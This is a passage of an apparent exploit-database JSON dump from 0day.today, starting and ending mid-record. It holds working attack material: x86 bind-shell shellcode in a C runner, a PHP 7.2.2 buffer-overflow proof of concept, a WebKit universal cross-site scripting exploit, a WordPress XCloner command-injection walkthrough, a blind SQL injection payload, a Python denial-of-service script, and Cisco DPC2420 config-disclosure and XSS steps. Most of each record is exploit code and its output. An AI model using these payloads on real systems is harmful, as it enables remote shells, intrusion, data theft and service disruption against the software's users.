\"\\x51\\x56\\x89\\xe1\\xb3\\x02\\xb0\\x66\\xcd\\x80\\x31\\xc0\\x50\\x50\\x50\\x50\\x50\\x66\"\r\n \"\\x68\\x05\\x39\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x89\\xe1\\xb3\\x02\\xb0\\x66\"\r\n \"\\xcd\\x80\\x6a\\x02\\x56\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x53\\x53\\x56\"\r\n \"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\\x93\\x29\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\"\r\n \"\\x79\\xf9\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\"\r\n \"\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\nint main() {\r\n // pollute the registers\r\n asm(\"mov $0x78975432, %eax\\n\\t\"\r\n \"mov $0x17645589, %ecx\\n\\t\"\r\n \"mov $0x23149875, %edx\\n\\t\");\r\n \r\n // begin shellcode\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n // execute our shellcode\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2018-09-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31002"}, {"lastseen": "2018-06-06T21:48:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "1337DAY-ID-30541", "href": "https://0day.today/exploit/description/30541", "title": "PHP 7.2.2 - php_stream_url_wrap_http_ex Buffer Overflow Exploit", "type": "zdt", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n \r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n \r\n if (tmp_line[tmp_line_len - 1] == '\\n') {\r\n --tmp_line_len;\r\n if (tmp_line[tmp_line_len - 1] == '\\r') {\r\n --tmp_line_len;\r\n }\r\n}\r\n \r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n \r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n \r\n \r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n \r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n \r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n \r\nExpected result:\r\n----------------\r\nNO CRASH\r\n \r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30541"}, {"lastseen": "2018-04-12T21:51:37", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27847", "id": "1337DAY-ID-27847", "type": "zdt", "title": "WebKit - ContainerNode::parserRemoveChild Universal Cross-Site Scripting Exploit", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1134\r\n \r\nHere's a snippet of ContainerNode::parserRemoveChild.\r\n \r\nvoid ContainerNode::parserRemoveChild(Node& oldChild)\r\n{\r\n disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)\r\n ...\r\n document().notifyRemovePendingSheetIfNeeded(); <<---- (b)\r\n}\r\n \r\nsubframes are detached at (a). But In |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again.\r\n \r\nPoC:\r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n \r\nlet xml = `\r\n<body>\r\n <div>\r\n <b>\r\n <p>\r\n <script>\r\n let p = document.querySelector('p');\r\n let link = p.appendChild(document.createElement('link'));\r\n link.rel = 'stylesheet';\r\n link.href = 'data:,aaaaazxczxczzxzcz';\r\n \r\n let btn = document.body.appendChild(document.createElement('button'));\r\n btn.id = 'btn';\r\n btn.onfocus = () => {\r\n btn.onfocus = null;\r\n \r\n window.d = document.querySelector('div');\r\n window.d.remove();\r\n \r\n link.remove();\r\n document.body.appendChild(p);\r\n \r\n let m = p.appendChild(document.createElement('iframe'));\r\n setTimeout(() => {\r\n document.documentElement.innerHTML = '';\r\n \r\n m.onload = () => {\r\n m.onload = null;\r\n \r\n m.src = 'javascript:alert(location);';\r\n var xml = \\`\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.d);\r\n</sc\\` + \\`ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>\\`;\r\n \r\n var tmp = document.documentElement.appendChild(document.createElement('iframe'));\r\n tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n m.src = 'https://abc.xyz/';\r\n }, 0);\r\n };\r\n \r\n location.hash = 'btn';\r\n </scrip` + `t>\r\n </b>\r\n </p>\r\n </div>\r\n</body>`;\r\n \r\nlet tf = document.body.appendChild(document.createElement('iframe'));\r\ntf.src = URL.createObjectURL(new Blob([xml], {type: 'text/html'}));\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/27847", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-11T11:51:07", "bulletinFamily": "exploit", "description": "WordPress Xloner plugin version 3.1.2 suffers from command execution and cross site scripting vulnerabilities.", "modified": "2015-06-03T00:00:00", "published": "2015-06-03T00:00:00", "id": "1337DAY-ID-23696", "href": "https://0day.today/exploit/description/23696", "type": "zdt", "title": "WordPress Xloner 3.1.2 XSS / Command Execution Vulnerabilities", "sourceData": "Title: Xloner v3.1.2 wordpress plugin authenticated command execution and XSS\r\nAuthor: Larry W. Cashdollar, @_larry0\r\nDate: 2015-05-10\r\nDownload Site: https://wordpress.org/plugins/xclonerbackupandrestore/ http://extensions.joomla.org/extensions/accessasecurity/ sitesecurity/ backup/665\r\nVendor: Ovidiu Liuta, @thinkovi\r\nVendor Notified: 0000-00-00\r\nVendor Contact: @thinkovi\r\nDescription: XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!\r\nVulnerability:\r\nLines 1129 of 1135 in cloner.functions.php\r\n\r\n1129 $excluded_cmd = \"\";\r\n1130 if ($fp = @fopen($_REQUEST['\r\n1130 if ($fp = @fopen($_REQUEST['excl_manual'], \"r\")) {\r\n1131 while (!feof($fp))\r\n1132 $excluded_cmd .= fread($fp, 1024);\r\n1133\r\n1134 fclose($fp);\r\n1135 }\r\n\r\nLine 1205:\r\nIf configured for manual mode the contents of $excluded_cmd are passed to exec();\r\n1205 exec($_CONFIG[tarpath] . \" $excluded_cmd \". $_CONFIG['tarcompress'] .\"vf $backup_file update $file\");\r\nWe need to supply a file with a list of commands to execute in it, we can create this via the backup comments feature. It creates a file under administrator/backups/.comments with whatever you want in it. Like ;id>/tmp/w00t;\r\n\r\nThen change the configuration to manual backup by selecting the radio button and perform a backup.\r\nHit this link:\r\nhttp://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_\r\n2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments\r\n\r\nIn a shell:\r\n$ cat /tmp/w00t\r\nuid=33(wwwdata)\r\ngid=33(wwwdata)\r\ngroups=33(wwwdata)\r\n\r\nAlso $excluded_cmd is XSS\r\n\r\nhttp://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_\r\n2028_sqlnodrop.tar&excl_manual=\u2019><script>alert(\u2018w00t\u2019);</script>\r\n\r\nChrome XSS alert:\r\n\r\nThe XSS Auditor refused to execute a script in\r\n'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_\u2026lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because\r\nits source code was found within the request. The auditor was enabled as the server sent\r\nneither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.\r\nplugins.php:403 The XSS Auditor refused to execute a script in\r\n'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_\u2026lno\r\ndrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because\r\nits source code was found within the request. The auditor was enabled as the server sent\r\nneither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.\r\n\r\nThe default template has an error with the LM_LOGIN_TEXT field so just clean that out or you\u2019ll get a syntax error when trying to execute.\r\nAdding foo\u201d);phpinfo();define(\u201cfoo to the Translation LM_FRONT_* fields then browsing to language/italian.php you\u2019ll execute phpinfo();.\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23696"}, {"lastseen": "2018-02-05T03:16:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "1337DAY-ID-23495", "href": "https://0day.today/exploit/description/23495", "type": "zdt", "title": "WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection Vulnerability", "sourceData": "# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection\r\n# Google Dork: inurl:wp-content/plugins/sp-client-document-manager\r\n# Date: 2015-03-04\r\n# Exploit Author: catsecurity\r\n# Vendor Homepage: http://smartypantsplugins.com\r\n# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip\r\n# Version: version 2.5.3 and previous version\r\n# Tested on: Chrome (It's PHP Application)\r\n# CVE : N/A\r\n \r\n \r\n# Timeline #\r\n[2015.03.05] Reported to the Vendor\r\n[2015.03.06?] Fixed in Update 2.5.4\r\n \r\n \r\n# Details #\r\n \r\n- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.\r\n- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].\r\n- \"pid\" variable is not sanitized\r\n \r\n \r\n# Vulnerable code #\r\n \r\nLine 1132: echo '<div id=\"dlg_cdm_thumbnails\">';\r\nLine 1133: if ($_GET['pid'] != \"\") {\r\nLine 1134: $r_current_project = $wpdb->get_results(\"SELECT * FROM \" . $wpdb->prefix . \"sp_cu_project WHERE id = \" . $_GET['pid'] . \"\", ARRAY_A);\r\nLine 1135: }\r\n \r\n \r\n# POC #\r\n/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]\r\n \r\nexample:\r\n/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)\r\n \r\nif yes it will sleep 5 seconds.\r\n \r\n \r\nThis vulnerable parameters must trance to integer\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23495"}, {"lastseen": "2018-01-02T13:07:21", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2013-09-23T00:00:00", "published": "2013-09-23T00:00:00", "id": "1337DAY-ID-21272", "href": "https://0day.today/exploit/description/21272", "type": "zdt", "title": "Share KM 1.0.19 - Remote Denial Of Service Vulnerability", "sourceData": "Title : Share KM 1.0.19 - Remote Denial Of Service\r\nProduct : Share KM desktop setup file\r\nVendor : SmartUX\r\nVulnerable Version(s) : 1.0.19 and probably prior release\r\nTested Version : 1.0.19\r\nTested On : Windows 7\r\nVulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]\r\nRisk Level : High\r\nCVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)\r\nDiscovered By : Yuda (gunslinger_) Prawira of cr0security - yuda[at]cr0security.com - http://www.cr0security.com\r\n \r\n \r\nIntroduction :\r\n==============\r\nShare Keyboard & Mouse (Beta)\r\nControl your Droid from your desktop with MOUSE and KEYBOARD. Just like\r\na Synergy. # ShareKM is a very handy tool for Android that lets you share\r\nyour computer's Mouse, Keyboard and Clipboard. You can download PC app at\r\nhttp://goo.gl/khfEb.\r\n \r\n- Based on / Copied from : https://play.google.com/store/apps/details?id=com.liveov.skm&hl=en\r\n \r\n \r\nAdvisory Details:\r\n=================\r\nShare KM suffers from Remote Denial Of Service (DOS). The Attacker could\r\nmake Share KM pc Server Crash or disconnect connection while Android\r\nclient is connected to Share KM server on PC. and the attacker could make\r\nShare KM server Crash when user is Showing RTT from notification taskbar.\r\n \r\n \r\nProof Of Concept :\r\n==================\r\nThe Attacker run this remote exploit DOS code targeted to remote server host,\r\nand the connection between server and android client will be disconected.\r\n \r\n--- Python Remote DOS code ---\r\n#!/usr/bin/python\r\nimport socket\r\n \r\nTCP_IP = '192.168.1.100'\r\nTCP_PORT = 55554\r\nBUFFER_SIZE = 1024\r\nMESSAGE = \"\\x41\" * 50000\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((TCP_IP, TCP_PORT))\r\ns.send(MESSAGE)\r\ns.close()\r\n------------- EOF -------------\r\n \r\nAnd after connection disconected, Show RTT on ShareKM icon in notification\r\ntaskbar. Application will be crashed.\r\n \r\nWith debugging (Log) :\r\n0:006> g\r\n04:56:44:720 : I Wifi.cpp(50, 0x186C) : accept() call succeeded. CientSocket = [0x220]\r\n04:56:45:203 : W RMISession.cpp(362, 0x186C) : Ctrl.rcpSessionConfig: uinput_flags.3, sdkVer.f, nativeVer\r\n04:56:45:203 : W ProtocolHandler.cpp(30, 0x186C) : sdkver.15, resol: 1024 x 552\r\n04:56:45:204 : I DlgBase.h(143, 0x186C) : onSessionEvent event: wifi client is connected.\r\n04:56:45:205 : I MessageSink.cpp(1096, 0x1F00) : StartInitWindowthread\r\n04:56:45:205 : I MessageSink.cpp(1109, 0x1F00) : StartInitWindowthread default desk\r\n04:56:45:206 : I MessageSink.cpp(210, 0x15E0) : InitWindow called\r\n04:56:45:206 : I MessageSink.cpp(223, 0x15E0) : InitWindow:OpenInputdesktop OK\r\n04:56:45:206 : I MessageSink.cpp(235, 0x15E0) : InitWindow:SelectHDESK to Default (23c) from 28\r\n04:56:45:207 : I MessageSink.cpp(117, 0x15E0) : wmcreate \r\n04:56:45:207 : I MessageSink.cpp(316, 0x15E0) : Load hookdll's\r\n04:56:45:207 : D MessageSink.cpp(341, 0x15E0) : ---trace---\r\n04:56:45:207 : D MessageSink.cpp(347, 0x15E0) : ---trace---\r\n04:56:45:207 : D MessageSink.cpp(353, 0x15E0) : ---trace---\r\n04:56:45:207 : I MessageSink.cpp(357, 0x15E0) : OOOOOOOOOOOO start dispatch\r\n04:56:45:207 : D MessageSink.cpp(360, 0x15E0) : ---trace---\r\n04:56:45:207 : I MessageSink.cpp(1134, 0x1F00) : StartInitWindowthread started\r\n04:56:45:207 : I RMISession.cpp(68, 0x1F00) : Global message hook is installed.\r\n04:56:52:926 : I MessageSink.cpp(932, 0x15E0) : MessageSink::onKey: Key char= , vk=VK_UP \r\n(26), nagr=0, lParam=0x01480001: scan.0148, press extended\r\n04:56:52:927 : I MessageSink.cpp(993, 0x15E0) : modifier.old=2000, new=2000\r\n04:56:53:046 : I MessageSink.cpp(932, 0x15E0) : MessageSink::onKey: Key char= , vk=VK_UP \r\n(26), nagr=0, lParam=0x81480001: scan.0148, release extended\r\n04:56:53:046 : I MessageSink.cpp(993, 0x15E0) : modifier.old=2000, new=2000\r\n, vk=VK_RETURN (0d), nagr=0, lParam=0x001c0001: scan.001c, press onKey: Key char=\r\n04:56:53:868 : I MessageSink.cpp(993, 0x15E0) : modifier.old=2000, new=2000\r\n04:56:53:939 : T TSocket.cpp(358, 0x186C) : closesocket(0)\r\n04:56:53:939 : I Wifi.cpp(50, 0x186C) : accept() call succeeded. CientSocket = [0x124]\r\n04:56:53:940 : T TSocket.cpp(358, 0x186C) : closesocket(544)\r\n04:56:53:941 : T TSocket.cpp(553, 0x1F00) : recv: ret.-1, E.10004\r\n04:56:53:941 : I RMISession.cpp(79, 0x1F00) : read error\r\n04:56:53:941 : I MessageSink.cpp(1429, 0x1F00) : unregistered hotkey id=304:56:53:941 :\r\nE MessageSink.cpp(1051, 0x1F00) : enter from MessageSink destructor.\r\n04:56:53:941 : I MSWindowsKeyState.cpp(1484, 0x1F00) : ctrl: data.0, real.0/0\r\n04:56:53:941 : T TSocket.cpp(164, 0x186C) : recv error : E.10053\r\n04:56:53:941 : I MessageSink.cpp(932, 0x15E0) : MessageSink::onKey: Key char= , vk=VK_LCONTROL\r\n(a2), nagr=0, lParam=0x801d0001: scan.001d, release \r\n04:56:53:941 : E TSocket.cpp(142, 0x186C) : send failed: E.10053\r\n04:56:53:942 : I MessageSink.cpp(993, 0x15E0) : modifier.old=2000, new=2000\r\n04:56:53:942 : I RMISession.cpp(468, 0x186C) : type.1: error flush.\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(1888.186c): Break instruction exception - code 80000003 (first chance)\r\neax=00000000 ebx=01377370 ecx=74f2de28 edx=01fef15d esi=00000000 edi=01a5be50\r\neip=74f2dca5 esp=01fef3a4 ebp=01fef420 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nkernel32!UnhandledExceptionFilter+0x5f:\r\n74f2dca5 cc int 3\r\n0:002> d esp\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\ShareKM\\ShareKM.exe\r\n01fef3a4 60 86 98 5d 50 be a5 01-28 31 38 01 d4 f9 fe 01 `..]P...(18.....\r\n01fef3b4 01 00 00 00 00 00 00 00-78 01 48 00 00 00 00 00 ........x.H.....\r\n01fef3c4 50 01 48 00 34 f4 fe 01-a2 43 c7 74 38 1e 4c 00 P.H.4....C.t8.L.\r\n01fef3d4 50 28 4c 00 1c f4 fe 01-2c 00 00 00 00 00 00 00 P(L.....,.......\r\n01fef3e4 5c f4 00 01 50 28 4c 00-60 01 00 00 40 f4 01 01 \\...P(L.`[email\u00a0protected]\r\n01fef3f4 01 00 00 00 00 00 00 00-00 00 00 00 06 00 00 00 ................\r\n01fef404 00 00 00 00 a4 f3 fe 01-00 65 36 77 d8 f9 fe 01 .........e6w....\r\n01fef414 6a 9b f5 74 48 7a 97 28-00 00 00 00 54 f7 fe 01 j..tHz.(....T...\r\n0:002> g\r\neax=00000000 ebx=74c5a256 ecx=00000000 edx=00000000 esi=0000004e edi=0386f42c\r\neip=77357094 esp=0386f2e0 ebp=0386f2f0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\nntdll!KiFastSystemCallRet:\r\n77357094 c3 ret\r\n0:007>\r\n \r\n \r\nReport-Timeline :\r\n=================\r\n21/09/2013 : Vendor Contacted / No response.\r\n22/09/2013 : Public Disclosure.\r\n \r\n \r\nRemediation :\r\n=============\r\nThere isn't remediation step from the Vendor until this Public Disclosure.\r\n \r\n \r\nReferences :\r\n============\r\n- Common Weakness Enumeration (CWE) - http://cwe.mitre.org\r\n- Share KM - https://sites.google.com/site/droidskm/\r\n- SmartUX Vendor - https://play.google.com/store/apps/developer?id=SmartUX\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21272"}, {"lastseen": "2018-02-07T01:30:28", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2012-12-09T00:00:00", "published": "2012-12-09T00:00:00", "id": "1337DAY-ID-19928", "href": "https://0day.today/exploit/description/19928", "type": "zdt", "title": "Cisco DPC2420 Multiples Vulnerabilities", "sourceData": "[0x00]> Details\r\n \r\n Vendor : Cisco\r\n Model : DPC2420\r\n type : Cablemodem router.=20\r\n Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin\r\n Software: D2425-P10-13-v202r12811-110511as-TRO\r\n Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html\r\n \r\n[0x01]> Configuration file disclosure\r\n \r\nSome ISP's (like the Argentinean Telecentro) could make some changes in the=\r\n router configration via the=20\r\nTCP 8080 port.\r\n \r\nIf the remote config option is enabled and the port is not filter, an attac=\r\nker can download this file=20\r\ncalling the correct URL. For example:\r\n \r\n \r\n$ wget http://foobar:8080/filename.gwc -O filename.gwc=20\r\n- --2012-12-08 21:24:43-- http://foobar:8080/filename.gwc\r\nConnecting to foobar:8080... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: unspecified [application/octet-stream Content-transfer-encoding: bi=\r\nnary]\r\nSaving to: =E2=80=9Cfilename.gwc=E2=80=9D\r\n \r\n [ <=3D> ] 15,=\r\n927 50.9K/s in 0.3s =20\r\n \r\n2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=\r\n27]\r\n \r\n$ head -n 10 filename.gwc=20\r\nCRCVALUE=3D4144540802;\r\n#<<Begin of Configuration File>>\r\nVersion=3D1.1;\r\nCreated Date=3D2012/12/8;\r\nCreated Time=3D21:24:43;\r\nModel Number=3DDPC2420;\r\nSerial Number=3D234905123;\r\nUser Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=\r\nl0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR\r\n7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=\r\nJz3HV6ci5wn3gMPi0rSTkUc3pzHdiK\r\nWMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=\r\newYRBbnRNKjMXC0fw+M9y4V7Y8S4B6\r\n3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D;\r\n[---OUTPUT OMITTED FOR SPACE REASONS---]\r\n \r\n[0x02]> - Persistent XSS\r\n \r\nWith a valid user in the router web interface for managment and configurati=\r\non, a user could insert JavaScript\r\ncode in this forms and make a XSS, for example add a parental rule called \"=\r\n'/><script>alert(1)</script>.\r\n \r\nhttp://192.168.0.1/RgParentalBasic.asp\r\n \r\n- -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png\r\n \r\n[0x03]> Authtype Basic=20\r\n \r\nAn attacker making an ARP poisoning attack could get the router loggin cred=\r\nentials due the web interface=20\r\nauthentication type is auth-basic.=20\r\nThen the attacker could get the Base64 encoded password and convert it to p=\r\nlain text easily.=20\r\n \r\n20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0=\r\n:372, ack 1, win 115\r\n \r\n 0x0000: 4500 01a8 fdf4 4000 4006 ccaf ac10 01f2 [email\u00a0protected]@.......\r\n 0x0010: c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e .......P....v...\r\n 0x0020: 8018 0073 03c2 0000 0101 080a 055f ee19 ...s........._..\r\n 0x0030: 0000 be7e 4745 5420 2f73 6967 6e61 6c2e ...~GET./signal.\r\n 0x0040: 6173 7020 4854 5450 2f31 2e31 0d0a 486f asp.HTTP/1.1..Ho\r\n 0x0050: 7374 3a20 3139 322e 3136 382e 302e 310d st:.192.168.0.1.\r\n 0x0060: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz\r\n 0x0070: 696c 6c61 2f35 2e30 2028 5831 313b 204c illa/5.0.(X11;.L\r\n 0x0080: 696e 7578 2078 3836 5f36 343b 2072 763a inux.x86_64;.rv:\r\n 0x0090: 3136 2e30 2920 4765 636b 6f2f 3230 3130 16.0).Gecko/2010\r\n 0x00a0: 3031 3031 2046 6972 6566 6f78 2f31 362e 0101.Firefox/16.\r\n 0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/\r\n 0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application\r\n 0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli\r\n 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 